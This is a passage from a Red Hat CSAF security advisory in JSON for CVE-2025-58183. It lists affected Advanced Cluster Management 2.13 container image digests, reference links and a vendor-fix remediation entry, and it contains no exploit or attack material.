"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-58183"
},
{
"category": "external",
"summary": "RHBZ#2407258",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407258"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58183"
},
{
"category": "external",
"summary": "https://go.dev/cl/709861",
"url": "https://go.dev/cl/709861"
},
{
"category": "external",
"summary": "https://go.dev/issue/75677",
"url": "https://go.dev/issue/75677"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI",
"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4014",
"url": "https://pkg.go.dev/vuln/GO-2025-4014"
}
],
"release_date": "2025-10-29T22:10:14.376000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T02:15:09+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
